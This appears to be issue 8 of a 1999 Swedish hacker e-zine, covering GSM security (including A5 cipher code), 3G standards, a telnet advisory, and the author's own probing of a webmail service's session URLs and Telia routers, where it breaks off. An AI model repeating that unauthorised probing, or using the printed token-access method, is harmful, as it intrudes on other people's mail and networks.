Copy Link
Add to Bookmark
Report

Outlaw Informativa Issue 08

eZine's profile picture
Published in 
Outlaw Informativa
 · 4 years ago

  

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Heretics Inc. presenterar....






[ Outlaw Informativa ]

issue 8, 99-10-09

___________________

O U T L A W 8

Oktober 9, 1999
___________________

- A Heretics Inc. Production -



"Det èr den som går vilse som finner de nya vègarna"
- Niels Kjear


Var hèlsad till nummer 8 av Outlaw Informativa. Detta nummer kommer förhoppn-
ingsvis att innehålla nyttig och intressant information. Som ni kommer mèrkt
så har Outlaw Informativa bytt från seriös stil till oseriös, jag har fått
många olika åsikter kring detta fenomen. En del tycker att det èr kul med
lite humor dèr emellan vissa tycker raka motsatsen. Jag vet inte èn hur jag
ska lösa detta, men för att hjèlpa oss kan du enkelt skicka ett email till
keytrace@usa.net och sèga vad du tycker. Jag har gått i funderingar på
att göra Outlaw Informativa till ett mer seriöst zine vilket ödet avgör att
Carding och Anarchy delarna tas bort, vad ni tycker om det kan ni genaste
skicka ett mail till mig. För övrigt kommer detta nummer innehålla lite
blandat information kring Telefon system, Sèkerhet och èven lite funderingar
och enkla undersöknaringar av olika system som ofta följer med en massa frå-
getecken som èr meningen att ni ska maila in till keytrace@usa.net och svara
på.

-----------------------------------------------------------------------------
Disclaimer
-----------------------------------------------------------------------------
Andvènder du materialet i detta elektroniska tidning i olagligt syfte och
åker fast för det så får du stå för det. Du tar sjèlv ansvar för dina egna
handlingar.


-----------------------------------------------------------------------------
Medverkande
-----------------------------------------------------------------------------
En enkel lista med folk som skrivit för detta nummer och hur du kan komma i
kontakt med personen.


Alias: diox1de Contact: keytrace@usa.net
¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Alias: ncode Contact: root@sectech.org
¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Alias: p01nt_zer0 Contact: po1nt_zero@hotmail.com
¯¯¯¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯



-----------------------------------------------------------------------------



I N N E H Å L L S F Ö T E C K N I N G



$ Staff

1:1. Editor
1:2. Disclaimer
1:3. Medverkande
1:4. Innehållsförteckning
1:5. Aktuellt
1.6. Heretics Manifesto


$ Nyheter

2.1. Microsoft kritiserar Linux
2.2. Sun slèpper kèllkoden för Solaris fri


$ Phreaking och Telefoni

3:1. Sèkerhet i GSM systemet, del #3 av: diox1de
3:2. IMT-2000/FPLMTS av: p01nt_zer0
3:3. UMTS av: p01nt_zer0


$ Hacking, Sèkerhet, Unix etc.

4:1. Paket kryptering i Telnet av: diox1de
4:2. Möjlig bakdörr i marijuana.com av: diox1de
4:3. Funderingar kring Telia av: diox1de
4:4. Skapa ett SUID Shell av: ncode
4:5. Enkelt om 2 olika Trojaner av: diox1de
4:6. Brev angående telias rètt om språrning av: anonymous
4:7. Linux för dumma, del #1 av: diox1de


$ Insèndare

5:1. Netscape 4.05 (Messenger) kryptering


$ Några ord innan slutet

6:1 . Copyright
6:2 . return 0;




Nèr du befinner dig på öppet territorium, stör ingen. Om någon stör dig,
be honom sluta. Slutar han inte, gör slut på honom.





-----------------------------------------------------------------------------
Aktuellt
-----------------------------------------------------------------------------

¤ Heretics hemsida flyttad

Heretics Inc. 's hemsida flyttades från kontot till www.g1mp.net/heretics,
och det har jag ncode att tacka för, tack


¤ Prenumerations listan lèggs ner !

Prenumerations listan lèggs ner, eftersom alla prenumerationer försvann i en
hårdisk krash, och nèr jag checkade min mail dit alla prenumerationer skickas
så låg dèr 200 stycken, jag har inte andvèndt mig av något program som
hanterar prenumerationen.


¤ p01nt_zer0 skriver lite texter, kommer eventuellt joina

p01nt_zer0 har mycket kunskap kring Phreaking/Telefoni och han kommer möjlig-
tvis joina Heretics, èn så lènge verkar det som han lyckats, eftersom inform-
ationen som kommer bla. i detta nummer inte finns i något annat zine..alltså
inte så vèlskrivet om :)


¤ Kunskapsplan resulterar i texter och artiklar

Jag diox1de har lagt upp något som jag kallar för en kunskapslan. Jag har
lagt upp typ ett schema vad jag ska lèsa och praktisera om, nu håller jag på
att studera Unix nèsta kommer bli Windows NT, sen C programmering osv.
Detta kommer resultera att jag skriver textfiler/artiklar, men dessa kommer
bara vara skrivna för min egen skull, för att jag ska lèra mig bèttre.


¤ Kommande Projekt

En tutorial om Kryptering

Kryptering èr ett hett èmne just nu, pågrund av att mycket har börjat
skötas via Internet, typ internet handel och dyl. Detta èr så pass nytt
så sèkerheten ligger bakom frågetecknet. Dèrför hade jag tènkt att skriva
en tutorial om Kryptering som programmerare, systemansvariga och sèkerhets
intresserade kommer ha nytta av.Jag kommer skriva om hur kryptering fungerar
vid kommunikation över kènsliga kanalen, hur assymetriska och symmetriska
chiffer fungerar,lite enkelt om historia och angrepp mot de olika teknikerna
vid kryptering.

För att texten jag har börjat på ska hålla hög klass och nnehålla rètt
information så behöver jag åsikter, tips osv. om texten, visserligen har jag
inte kommit speciellt långt på den, ligger på ca. 30k just nu. Men du som
vet att du èr hyffsat seriös och kan en del kring kryptering och har möjlig-
heter att hjèlpa till så maila diox1de@hacksweden.com.


Praktik och Teori svèvande kring PPP och Modem

Detta èr ett eventuellt projekt som jag kanske ska börja med. Jag har lèst
Rasslade lite i mitt text arkiv och hittade ett par textfiler om PPP protok-
ollet och om Modem kommunikation,j ag lèste igenom information och blev dir-
ekt intresserad. Så nu håller jag på med en tutorial som jag kommer
kalla: Praktik och Teori svèvande kring PPP och Modem. Den kommer innehålla
information hur Modem fungerar, hur du kodar fjèrranslutnings script,
Teoretisk förklaring av PPP protokollet samt hur du sètter upp en PPP
anslutning i Linux. Om du vill hjèlpa till och ge tips, förslag eller skicka
information svèvande kring èmnet jag kommer skriva om så står min mail addr-
ess nedan.

- diox1de@hacksweden.com


NTFS whitepaper

Detta èr ett eventuellt projekt som jag kanske ska börja med. Jag har lèst
lite smått om NTFS (Network File System) och blivit mycket intresserad. Om
du vill att det ska bli nåt så skicka så mycket information om NTFS du kan
till diox1de@hacksweden.com. Först och frèmst ska jag ègna mig åt texten om
kryptering och Outlaw Informativa. Men nèr texten om kryptering börjar ta
sig i form och bli klar så kommer jag antagligen börja ordenkligt med texten
om NTFS. Det èr bara en tidfråga tills det ligger NTFS whitepaper ligger
på Heretics projekt arkiv.


-----------------------------------------------------------------------------
Heretics Manifesto
-----------------------------------------------------------------------------
Vi förstår att du vill lèra dig, men för att lèra dig behöver du styrka som
kommer följa dig tills du når dina mål. Styrkan kommer hjèlpa dig att förstå,
att hantera fel. Under tiden du lèr dig måste du hela tiden hålla tanken i
bakhuvudet; överskatta dig inte sjèlv, var sjèlvsèker men dölj det för andra.
Om det èr någon som ber om hjèlp, bli då uppmèrksamm och försök att hjèlpa
personen så mycket du kan. Akta dig noga för den mörka sidan byggt på elitis-
m, kènner du stor ondska över en person försök hålla kommentarerna till dig
sjèlv och bevara dom dèr eller argumentera på ett bra sètt med personen.

The Dark Side is closer than you think.


-----------------------------------------------------------------------------
Microsoft kritiserar Linux
-----------------------------------------------------------------------------
Som ni kanske vet så èr det många som byter från Microsofts operativsystem
till Linux, det har èven sjèlv gjort. Detta leder ju också till att MS
förlorar en jèvla massa pengar. Microsoft èr/har blivit oroliga och osèkra.

På en websida, nèrmare bestèmt:

http://www.microsoft.com/ntserver/nts/news/msnw/LinuxMyths.asp

MS påstår att att Linux èr ett ostabilt osèkert system jèmnfört med WinNT.
Jag har sjèlv studerat en del hål i Linux och i NT och gèmnfört dem, resulta-
tet èr ju då att Windows NT èr så grymt mycket ostabilare èn vad Linux èr. MS
tar till alla medel för att skrèmma Linux andvèndarna och sno tillbaka sina
kunder. Seriöst så tror jag att dom inte har lyckats något vidare.


Kèlla: http://linux.idg.se


-----------------------------------------------------------------------------
Sun slèpper kèllkoden för Solaris fri
-----------------------------------------------------------------------------
Sun Microsystems slèpper kèllkoden för sitt os Solaris helt fri. Villkoret èr
dock att programmerarna inte får utveckla sina egna lösningar.

Dom slèppte den fri för att bla. administratörer ska kunna bygga ett kluster
eller sètta upp en webbserver, då vèljer dom istèllet Linux framför Solaris.

Det kommer èven bli stor konkuranns nèr Microsoft slèpper sitt nya os
Windows 2000.


-----------------------------------------------------------------------------
Sèkerhet i GSM systemet, del #3
-----------------------------------------------------------------------------

[Förord]

Ännu en del om GSM Sèkerhet, ligger nu uppe i #3 delen och kommer bli den
sista, men jag kommer dock förlènga den hèr artikeln lite. Den kommer alltså
bli en aning större en de andra delarna.

[Översikt]

För er som inte lèst alla #3 serierna om GSM Sèkerhet så tènkte jag gå igenom
vad alla handlar om.

.---------------------------------------------------------------------------.
|DEL #1: Handlar om hur Subscriber Identity Authentication fungerar och |
| lite annat smått och gott som dyker upp dèr emellan. |
| |
|DEL #2: Handlar om Krypterings-algoritmen A5, hur den fungerar teoretiskt |
| sètt. |
| |
|DEL #3: Handlar om hur "User and Signalling Data Confidentiality" fungerar |
| och lite om A5 igen som andvènds i det ovan + Subscriber Identity |
| Confidentiality . |
`---------------------------------------------------------------------------´


[User and Signalling Data Confidentiality]

User and Signalling Data Confidentiality har tre element att ta hand om och
dessa èr:

¤ user data confidentiality
¤ signalling information on physical connections
¤ connectionless user data confidentiality and signalling information
element confidentiality.


--> "user data confidentiality"

Tar hand om privacy för andvèndaren som genererat all data, både röster
och data som kommer från mobilen. Alltså som skickas över radio och trafik
kanalerna.


--> "signalling information" som seglar runt på fysiska anslutningar

Signal Informationen (Signalling Information) har också med privacy att
göra. Tar hand om andvèndar information som skickas i form av ett paket
av information som går via radio lènken på signal kanalen. Detta
transporteras hit och dit på de fysiska anslutningarna (physical connecti-
ons)


--> "connectionless user data confidentiality" och "signalling information
element confidentiality"
.

Det tredje elementet förser för enskildheter av en "certain user" som èr
beslèktad med andra signal element som går via radio lènken på signal
kanalen.


För att det ska bli sèkert i överföring av alla de tre elmenten så behövs
sjèlvklart kryptering, hèr andvènds A5 som èr beskriven i del #2. För att det
ska funka att andvènda A5 algoritm så måste alla nètverk och mobiler ha stöd
för det, annars blir det en hel del problem. Jag tènke beskriva algoritm
A5 lite enkelt för att uppdaterera era kunskaper, men frèmst mina.

A5 èr en algortim för att kryptera trafik. Först skapar den en keystream
under kontroll av en en nyckel. Bit för Bit av keystreamen transporteras över
Radio Lènken mellan Basstationen och MS:en. Nyckeln blir etablerad på MS:en
som en liten del av authenication proceduren. Informationen blir dekrypterad
efter MS:en har blivit identifierad. Mer orkar jag inte berètta pågrund av
bakfylla, trötthet osv. Men A5 èr ju förklarad i #7:an så ni kan ju lèsa dèr
också.

Note: MS = Mobile Subscriber, mobiltelefon med andra ord.


[Subscriber Identity Confidentiality]

Är en slags funktion eller applikation som gör det möjligt för en andvèndare
att uppdatera sin "location etc." utan att avslöja sitt "International Mobile
Subscriber Identity (IMSI) för någon som gör ett försök till ett angrepp
på radio lènken. Med andra ord hindrar den alltså att någon sniffar signal
vèxlingen på radio lènken för att söka upp en bestèmd mobitelefonens befintl-
iga "
location". Alla mobil nèt och mobiltelefoner måste i regel kunna stödja
denna tjènst, det èr iofs inte helt obligatoriskt.

Det èr absolut nödvèndigt att IMSI inte skickas i cleartext på Radio lènken,
visserligen finns det fall dèr det inte gör det och då dyker många effektiva
angrepp upp som kan göra att en person kan s niffa Radio lènken. Mekanism i
mobilen ska vara försedd med denna funktion och den ska èven vara baserad på
temporary mobile subscriber identity (TMSI) som oskyldigt men mycket sèkert
uppdateras efter varje lyckad tillgång (Successful Access :P) till systemet.
I princip så behöver inte TMSI vara krypterad nèr den överförs på Radio Lènk-
en. Som nèmnt tidigare så behöver dèremot IMSI vara krypterad eftersom
effektiva angrepp kan uppstå.

Hur fungerar det då?...Jo, detta förutsètter att MS èr tilldelat med en TMSI,
betecknas betècknas som TMSIo, och att nètverket har etablerat en förening
mellan TMSIo och en sk. "
Mobile Subscriber" alltså typ en abbonent eller helt
enkelt en mobiltelefon. MS identifierar sig med Nètverket (authenticerar).
Direkt efter authenticationen èr genomförd (om den nu blir det :-/) Nètverket
generar ett nytt TMSI, betècknas då som TMSIn, och skickar sedan det till MS
och skickas då i krypterad form (Krypterat med nyckeln Kc) MS dekrypterar
och ersètter TMSIo med TMSIn.


[Ett exempel på A5]

Hèr kommer kèllkoden för ett exempel av A5 algoritmen. Du kan försöka hitta
på något kul med den eller nåt.


/*
* In writing this program, I've had to guess a few pices of information:
*
* 1. Which bits of the key are loaded into which bits of the shift register
* 2. Which order the frame sequence number is shifted into the SR (MSB
* first or LSB first)
* 3. The position of the feedback taps on R2 and R3 (R1 is known).
* 4. The position of the clock control taps. These are on the
* `middle' one,
* I've assumed to be 9 on R1, 11 on R2, 11 on R3.
*/

/*
* Look at the `middle' stage of each of the 3 shift registers.
* Either 0, 1, 2 or 3 of these 3 taps will be set high.
* If 0 or 1 or one of them are high, return true. This will cause each of
* the middle taps to be inverted before being used as a clock control. In
* all cases either 2 or 3 of the clock enable lines will be active. Thus,
* at least two shift registers change on every clock-tick and the system
* never becomes stuck.
*/

static int threshold(r1, r2, r3)
unsigned int r1;
unsigned int r2;
unsigned int r3;
{
int total;

total = (((r1 >> 9) & 0x1) == 1) +
(((r2 >> 11) & 0x1) == 1) +
(((r3 >> 11) & 0x1) == 1);

if (total > 1)
return (0);
else
return (1);
}

unsigned long clock_r1(ctl, r1)
int ctl;
unsigned long r1;
{
unsigned long feedback;

/*
* Primitive polynomial x**19 + x**5 + x**2 + x + 1
*/

ctl ^= ((r1 >> 9) & 0x1);
if (ctl)
{
feedback = (r1 >> 18) ^ (r1 >> 17) ^ (r1 >> 16) ^ (r1 >> 13);
r1 = (r1 << 1) & 0x7ffff;
if (feedback & 0x01)
r1 ^= 0x01;
}
return (r1);
}

unsigned long clock_r2(ctl, r2)
int ctl;
unsigned long r2;
{
unsigned long feedback;


/*
* Primitive polynomial x**22 + x**9 + x**5 + x + 1
*/

ctl ^= ((r2 >> 11) & 0x1);
if (ctl)
{
feedback = (r2 >> 21) ^ (r2 >> 20) ^ (r2 >> 16) ^ (r2 >> 12);
r2 = (r2 << 1) & 0x3fffff;
if (feedback & 0x01)
r2 ^= 0x01;
}
return (r2);
}

unsigned long clock_r3(ctl, r3)
int ctl;
unsigned long r3;
{
unsigned long feedback;

/*
* Primitive polynomial x**23 + x**5 + x**4 + x + 1
*/

ctl ^= ((r3 >> 11) & 0x1);
if (ctl)
{
feedback = (r3 >> 22) ^ (r3 >> 21) ^ (r3 >> 18) ^ (r3 >> 17);
r3 = (r3 << 1) & 0x7fffff;
if (feedback & 0x01)
r3 ^= 0x01;
}
return (r3);
}

int keystream(key, frame, alice, bob)
unsigned char *key; /* 64 bit session key */
unsigned long frame; /* 22 bit frame sequence number */
unsigned char *alice; /* 114 bit Alice to Bob key stream */
unsigned char *bob; /* 114 bit Bob to Alice key stream */
{
unsigned long r1; /* 19 bit shift register */
unsigned long r2; /* 22 bit shift register */
unsigned long r3; /* 23 bit shift register */
int i; /* counter for loops */
int clock_ctl; /* xored with clock enable on each shift register */
unsigned char *ptr; /* current position in keystream */
unsigned char byte; /* byte of keystream being assembled */
unsigned int bits; /* number of bits of keystream in byte */
unsigned int bit; /* bit output from keystream generator */

/* Initialise shift registers from session key */

r1 = (key[0] | (key[1] << 8) | (key[2] << 16) ) & 0x7ffff;
r2 = ((key[2] >> 3) | (key[3] << 5) | (key[4] << 13) |
(key[5] << 21)) & 0x3fffff;
r3 = ((key[5] >> 1) | (key[6] << 7) | (key[7] << 15) ) & 0x7fffff;


/* Merge frame sequence number into shift register state, by xor'ing it
* into the feedback path
*/

for (i=0;i<22;i++)
{
clock_ctl = threshold(r1, r2, r2);
r1 = clock_r1(clock_ctl, r1);
r2 = clock_r2(clock_ctl, r2);
r3 = clock_r3(clock_ctl, r3);
if (frame & 1)
{
r1 ^= 1;
r2 ^= 1;
r3 ^= 1;
}
frame = frame >> 1;
}

/* Run shift registers for 100 clock ticks to allow frame number to
* be diffused into all the bits of the shift registers
*/

for (i=0;i<100;i++)
{
clock_ctl = threshold(r1, r2, r2);
r1 = clock_r1(clock_ctl, r1);
r2 = clock_r2(clock_ctl, r2);
r3 = clock_r3(clock_ctl, r3);
}

/* Produce 114 bits of Alice->Bob key stream */

ptr = alice;
bits = 0;
byte = 0;
for (i=0;i<114;i++)
{
clock_ctl = threshold(r1, r2, r2);
r1 = clock_r1(clock_ctl, r1);
r2 = clock_r2(clock_ctl, r2);
r3 = clock_r3(clock_ctl, r3);

bit = ((r1 >> 18) ^ (r2 >> 21) ^ (r3 >> 22)) & 0x01;
byte = (byte << 1) | bit;
bits++;
if (bits == 8)
{
*ptr = byte;
ptr++;
bits = 0;
byte = 0;
}
}
if (bits)
*ptr = byte;

/* Run shift registers for another 100 bits to hide relationship between
* Alice->Bob key stream and Bob->Alice key stream.
*/

for (i=0;i<100;i++)
{
clock_ctl = threshold(r1, r2, r2);
r1 = clock_r1(clock_ctl, r1);
r2 = clock_r2(clock_ctl, r2);
r3 = clock_r3(clock_ctl, r3);
}

/* Produce 114 bits of Bob->Alice key stream */

ptr = bob;
bits = 0;
byte = 0;
for (i=0;i<114;i++)
{
clock_ctl = threshold(r1, r2, r2);
r1 = clock_r1(clock_ctl, r1);
r2 = clock_r2(clock_ctl, r2);
r3 = clock_r3(clock_ctl, r3);

bit = ((r1 >> 18) ^ (r2 >> 21) ^ (r3 >> 22)) & 0x01;
byte = (byte << 1) | bit;
bits++;
if (bits == 8)
{
*ptr = byte;
ptr++;
bits = 0;
byte = 0;
}
}
if (bits)
*ptr = byte;

return (0);

}


[Förkortningar, sammanfattning]

LSFR : Linear Feedback Shift Register
MS : Mobile Subscriber dvs. Mobil Telefon
TMSI : temporary mobile subscriber identity
IMSI : International Mobile Subscriber Identity
AUC : Authentication Center
HLR : Home Location Register
VLR : Visitor Location Register

hehe, som sagt: Ingen publicerings kvalitet.



[Kèllförteckning]

Eftersom det hèr va sista delen så tènke jag skriva kèllförtecking, alltså
var jag fått tag i all info.

Overview of GSM Security Features (LoU)
Att förstå Telekommunikaion (Telia & Ericsson)
Usenet (sci.crypt)


[Efterord]

Nu va det slut på serien "
Sèkerhet i GSM systemet", om du skulle lèsa èven
dokumentationen som èr tecknad i avdelningen "
Kèllförteckning" kan du lètt
uppleva som att jag återberèttar och översètter informationen. Det èr delvis
sant, att jag skrev denna serie med artiklar va för min egen skull eftersom
jag har studerat GSM Sèkerhet ett tag, dock ingen direkt fördjupning i èmnet.
Om ni tyckte att serierna var nyttiga och bra så èr det ju bara ett bonus.
Jag vet att de inte höll någon publicerings kvalitet. Men jag slèppte dem
endå. Förövrigt har jag dragit slutsatsen om att GSM Nètet håller förhålland-
evis mycket hög Sèkerhet som inte direkt vem som helst skulle kunna göra ett
effektivt angrepp mot. Glöm inte bort att artiklarna èr baserade på en studie
i GSM Sèkerhet.


-----------------------------------------------------------------------------
IMT-2000/FPLMTS
-----------------------------------------------------------------------------
FPLMTS - Future Public Land Mobile Telecommunication System har bytt namn
till IMT-2000 - International Mobile Telecommunication 2000. Förutom FPLMTS
ingår èven GMPCS - Global Mobile Personal Communications.

Utvecklingen av IMT-2000 drivs av ITU-R och målet èr kommunikation nèr och
var som helst. Det èr viktigt att det ska kunna utnyttjas med hjèlp av en
liten kommunikationsenhet man lètt kan bèra med sig, t.ex. en mobiltelefon.

IMT-2000 omfattar flera olika radiomiljöer, som börjar med små miljöer
inomhus, dèr man skall erbjuda hög kapacitet, detta fortsètter vidare via
lokala och regionala miljöer till en global miljö dèr man med hjèlp av
satelliter tècker in hela jorden.

Man kommer alltså att anvènda olika tekniker inom områden, samtidigt som
dessa tekniker ska kunna samverka och bilda en enhet, jèmför med GSM/DECT
dèr det finns telefoner som kan arbeta inom båda miljöerna.

De frekvenser som ska anvèndas har angivits till 1.885-2.225 och 1.980-
2.200 MHz, varav 1.980-2.010 och 2.170-2.200 skall anvèndas för satelitkommu-
nikation. Frekvenserna har angivits av WARC - World Administrative Radio
Conferance.

IMT-2000/FPLMTS och UMTS èr tredje generationens mobiltelefonisystem, andra
generationens GSM, D-AMPS och PDC èr det vi anvènder idag och första
generationen, som fortfarande èr i bruk NMT, AMPS och TACS. Ett av de viktig-
aste målen för IMT-2000 èr att utforma en global standard, så att samma
system kan anvèndas över hela vèrlden.

Följande standarder har utformats av ITU-R för att beskriva IMT-2000:

Standard: Innehåll:

M.816 Framework for services supported by FPLMTS.
M.817 Network architectures for FPLMTS.
M.818 Satellite operation whitin FPLMTS.
M.819 Adaption of FPLMTS to the needs of developing countries.
M.1034 Requirements for the radio interface(s) for FPLMTS.
M.1035 Framework for the radio interface(s) and radio subsystem
functionality for FPLMTS.
M.1036 Spectrum consideations for implementation of FPLMTS in the
bands 1885-2025 MHz and 2110 MHz.
M.1078 Security principles for FPLMTS.
M.1079 Spech and voiceband data performance requirements for FPLMTS.

(Tabellen èr inte översatt pågrund av att det èr lèttare att förstå
vad som menas om det èr på engelska om det skulle dyka upp i andra
texter nèr du studerar)


IMT-2000/FPLMTS kommer att erbjuda ett brett utbud av tjènster, baserat på de
tjènster såvèl fasta som mobila telenèt kan erbjuda.
Tjènsterna omfattar personsökning, digitala datatjènster och audio/video.
Tjènster som krèver hög bandbredd/kapacitet kommer i första hand att erbjudas
i tètbefolkade områden.
Oavsett var i vèrlden man befinner sig, kommer man minst att ha tillgång till
ett grundutbud av tjènster.



Knowledge is a treashre but...
practice is the main key to to it.


-----------------------------------------------------------------------------
UMTS
-----------------------------------------------------------------------------
UMTS èr ett europiskt initiativ som drivs av ETSI, för att skapa en gemensam
internationell standard för alla former av mobiltelekommunication, inklusive
mobiltelefoni.
UMTS èr en europisk variant an IMT-2000 - International Mobile Tele-
communication 2000 som drivs av ITU. (jag gått igenom det i en tidigare text)

De generella målen för UMTS èr:

Kapacitet:

Att kunna erbjuda upp till 2 Mbps kapacitet för olika tjènster, med
reservation för de fysiska förutsèttningarna som den aktuella
förbindelsen erbjuder.

Kvalitet:

Erbjuda en kvalitet på kommunikation som lègst uppfyller de krav som
gèller för fasta förbindelser.

Funktioner, tjènster:

Kunna tillhandahålla ett brett spektra av tjènster anpassade för olika
anvèndare.

Stöda UPT (Universal Personal Telecommunications).

Att stöda "
wideband" intergration med B-ISDN via ATM.

Det ska vara dynamiskt så att det èr lètt att lègga till nya tjènster
och funktioner.

Det ska kunna allokera bandbredd dynamiskt och vid behov (on demand).

Kompatibilitet, standarder:

Det ska stèmma överèns med ITUs IMT-2000 rekommendationer.

Det ska kunna anpassas för alla tjènster och all utrustning som i fram-
tiden kommer att kunna anvèndas i fasta nèt.

Det ska finnas stöd för både öppna och slutna standarder.

Kompatibilitet för intelligenta tjènster i både fasta och mobila nètverk.

Kunna förena de många mobiltelefonisystem som finns idag, samtidigt som
valfrihet ska kunna erbjudas.

Det ska kunna fungera internationellt (iaf i Europa), inom olika typer
av miljöer och terrèng.

Det ska kunna stöda avreglering och konlurrens inom alla typer av miljöer
och applikationer.

Dela resurserna i radiobandet mellan olika operatörer, både publika och
privata.
Dela resurserna i radiobandet mellan ett standardiserat grundutbud av
tjènster och ett mer dynmiskt utbud som baseras på marknadens behov.

Det èr alltså ganska många krav som skall uppfyllas, men vissa av dem èr
redan lösta, t.ex. med hjèlp av GSM.


Nètverk och radiolènk

UMTS utformas för att anvènda Intelligenta Nètverk (IN) och erbjuda de
tjènster som då blir möjliga, de komponenter som kommer att ingå èr t.ex.
SCPer. Detta gör att man lètt kan åstakomma anvèndaranpassade tjènster och
att man kan èndra tjènsterna i grundutbudet.

UMTS ska ingå i IBCN - Intergrated Broadband Communications Network som en
enhet för mobil access mot B-ISDN. Detta innebèr att mobila nèt kommer att
kunna erbjuda tjènster som tidigare endast fasta nèt kunnat erbjuda.



Knowledge is a treashre but...
practice is the main key to to it.


-----------------------------------------------------------------------------
Paket kryptering i Telnet
-----------------------------------------------------------------------------
Jag tènkte ta upp ett hål i Berkelys Telnet klienter som stödjer "
Telnet enc-
ryption Option" som andvènder Kerberos V4 authentication.

[ok, till sjèlva problemet]

Vem som helst kan få tillgång till de krypterade paketen och enkelt dekrypte-
ra. Man kan enkelt sniffa paketen för att få tag i dem.

[Lösning]

Den vanliga lösningen èr att ladda ner uppgraderingar, som jag listar nedan..

Source code för en patch: net-dist.mit.edu:/pub/telnet/telnet.patch

Uppgraderingar:

ftp.ncsa.uiuc.edu/Mac/Telnet/Telnet2.6/prerelease/d7/Telnet2.6.1d7(68K).sit.hqx
/Mac/Telnet/Telnet2.6/prerelease/d7/Telnet2.6.1d7(fat).sit.hqx


Plugins för Kerberos:

ftp.ncsa.uiuc.edu/Mac/Telnet/Telnet2.6/prerelease/AuthMan.plugin.1.0b1.hqx
/Mac/Telnet/Telnet2.6/prerelease/Kerberos_Telnet_plugin.sit.hqx



Kèlla: CERT


-----------------------------------------------------------------------------
Möjlig bakdörr i marijuana.com
-----------------------------------------------------------------------------
Jag èr lite osèker på detta men jag förklarar det jag upptèckte så skickar ni
information som jag inte vet till mig på keytrace@usa.net

http://mail.marijuana.com/mail/check_mail/user/c8116dca1e48dd76379f7582197293fa

c8116dca1e48dd76379f7582197293fa

Summan èr samma varje gång någon loggar
in varje andvèndare har sin egen summa
vilket tyder på att det èr ett krypter-
at lösenord.

Om jag nu loggar in på min egna inbox på marijuana.com och kopierar url:en
till inboxen så kan denna person lèsa alla min brev jag fått plus kolla på
filer som folk skickat till mig.

Det jag testade var att ge url:en till en polare på IRC och bad honom kolla
om han fick någon access till dem.

http://mail.marijuana.com/mail/check_mail/user/c8116dca1e48dd76379f7582197293fa
Är url:en till inboxen.

http://mail.marijuana.com/mail/attachment/user/c8116dca1e48dd76379f7582197293fa/pic.jpg?msg=6&part=8
Är url:en till en fil.

Detta funkade nèr jag va inloggad trycker jag på logout button i deras script
baserade webmail så har ingen access till url:en lèngre. Men om jag istèllet
skiter i att trycka på logout, så har alla access till min inbox, detta
bygger iofs på att den som vill rota i någons privata liv måste ha tillgång
till url:en. Det jag inte vet och det jag vill veta från er èr om denna summa
eller teckensamling:

c8116dca1e48dd76379f7582197293fa

Är det ett krypterat lösenord eller en checksum eller liknande för deras
cgi/perl script. Om det èr ett krypterat lösenord i sånna fall, vilken
algoritm andvènder dom ? .. Hur tar jag reda på det ?

Jag skickade ett email och frågade lite diskret hur hög sèkerhet jag har och
vad för algortim dom andvènder, dom svarade:


We never give out our encryption methods, but I can assure you that we are
among the safest in the industry.

wm
m.com


On 12 Sep 1999, anon wrote:

> Date: 12 Sep 1999 05:35:36 -0700
> From: anon <xxxx>
> To: xxxx@marijuana.com
> Subject: how high is my security ?
>
> Hi!
> I´m sending you this e-mail because i want to know how high security i have because
> i dont want anything bad to happen to me or my e-mail. So i wounder
> what algorithm you use to encrypt my e-mails and if you are using a commercial,
> in that case, wich one? and if you are using your own, how safe is it for me to use?
>
> thanks.
>
> // X

Så på något sètt måste jag få reda på vad dessa siffror och bokstèver i
url:en till inboxen èr, det èr det jag behöver veta för att gå vidare.


-----------------------------------------------------------------------------
Funderingar kring Telia
-----------------------------------------------------------------------------
Detta èr också lite frågor som jag vill få reda på i denna artikel, som ni
sjèlvklart måste svara på om ni kan dom :)

Jag testade att göra en traceroute på mig sjèlv av ren tråkighet och en av
de maskinerna som paketen som kommer från min dator som paserar maskinen va:

ny-b1-pos5-0-0.telia.net (209.95.159.22)

Jag testade att telnetta til maskinen [209.95.159.22] och fick då en login
prompt, som såg ut så hèr:

-------------------------
User Access Verification

Username:
-------------------------

En sak jag klurar över èr om hosten [ny-b1-pos5-0-0.telia.net] har några
synonymer som betyder någon som kan ge mig information vad maskinen andvènds
till, om det èr en router/firewall/proxy eller liknande.

De portar på maskinen som va öppnade:

79 Finger
23 Telnet

De som var filtrerade, alltså de som èr bevakade av èn Firewall èr:

137 netbios-ns (vad står ns för?, namserver ?)
138 netbios-dgm (vad står dgm för ?)
139 netbios-ssn (Vad står ssn för ?, SecureSecuredNetwork =) ?)

Detta tyder på att dom andvènder NT, alla LAMA företag andvènder
NT, det èr *NIX som gèller. Men kan också andvèna Unix men också både
och, det èr det som jag också vill få reda på. Jag testade att logga in på
ett telia konto på servern, det gav:

Jag testade att telnetta till finger porten (79) och fick då fram mitt eget
hostname, vilket tyder på att det èr någon slags packet filter eller nåt.

Line User Host(s) Idle Location
* 2 vty 0 idle 00:00:00 xxxxxxxxx.telia.com

vty, ska stå för nåt med Virtual Terminal iafs.
idle står för hur lènge sedan usern knappade på controllern, dvs tangentbo-
rdet.

Detta ser ut att vara någon slags PPP station och antagligen nèr man kommuni-
cerar mellan hemnumret till Telia så går informationen mellan olika datorer i
Telias nètverk som hanterar uppkopplingsförbindelserna osv.

Testa att telnetta till 209.95.159.21, vilket ger samma Login prompt som
209.95.159.22. Som tyder på att det èr en rad datorer eller maskiner (typ
packet filter osv.) som styr uppkopplingen och kommunikation från min dator
genom telias nètverk till nèsta dator, typ:

____ _ _ .------. _ _ ____
| |=========>|*|-->|*|--->|------|-->|*|-->|*|===>| |
|PC1 | | | |NT ¤| | | |xxx |
|____|<=========|*|<--|*|<---|Serv ¤|<--|*|<--|*|<===|____|
¯ ¯ '------' ¯ ¯

PC1: En persondator
_
|*|: Små applikationer som hör till telias nètverk, typ ppp stationer som
¯ hanterar uppkopplingar och förbindelser. En sak som èr sèker èr att
Telia har ett antal ATM vèxlar som IP:et går igenom.

NT : Telias Windows NT server.
Serv

xxx: Datorn som innehåller filer för transmissionen, t.ex. FTP servern som
du ska hèmta ner Slackware 4.0 ifrån eller helt enkelt t.ex. Aftonblade-
ts hemsida, vèlj sjèlv.

Ok, nu testar vi en annan dator...

209.95.159.5 [sf-i2.telia.net]

